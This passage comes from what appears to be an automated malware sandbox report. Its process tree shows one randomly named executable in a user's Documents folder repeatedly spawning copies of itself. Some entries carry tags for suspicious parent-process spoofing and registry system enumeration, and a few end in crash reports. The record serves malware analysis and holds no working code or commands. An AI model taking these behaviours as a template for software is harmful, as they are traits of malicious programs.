        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:7688
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5460
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:880
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5620
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:4960
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:4012
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        
        PID:5136
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2864
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:3060
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6432
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2252
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5280
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5600
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8340
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8988
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:7392
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:3036
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6852
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9148
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8280
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9036
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2080
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9668
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:10208
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9644
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9036
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:10604
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6228
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:11200
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5256
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:11508
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:7344
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2828
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8860
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6172
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:11036
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9724
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:10660
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10660 -s 28
        7⤵
        Program crash
        
        PID:7140
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:11560
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:12372
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:13092
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:7220
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:13808
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:13076
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:13680
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6952
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2576
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:15124
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:14740
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:7128
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6404
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 28
        7⤵
        Program crash
        
        PID:15180
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:3016
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:10456
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:4696
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:13012
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:204
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:1556
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2620
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:11696
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9796
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:15608
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2616
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:10220
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16052
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:15248
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16116
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9432
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5264
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:12212
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16496
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16828
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:17220
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16148
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16388
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:236
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:7348
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:17068
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 17068 -s 28
        7⤵
        Program crash
        
        PID:14868
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16716
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16876
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9496
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:17740
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:13308
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:10264
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:15040
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8376
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9520
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18564
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8724
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18452
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19152
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18444
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9152
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18872
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:10392
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19684
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19916
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18672
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:20464
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8384
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19780
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:17452
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5796
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:15668
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18812
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19476
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19400
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:20852
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:17436
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:21056
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:21456
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19708
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19136
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:13688
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:21424
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16068
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:20056
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:14528
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18800
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:20820
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8924
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:21744
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:22456
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:20808
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:17120
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:21236
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:22192
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:21848
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:15076
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6900
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:22816
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:20736
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:22996
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23108
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23508
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23224
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:15472
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9308
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:17288
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:11252
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23848
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:20812
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9784
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9784 -s 28
        7⤵
        Program crash
        
        PID:3272
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
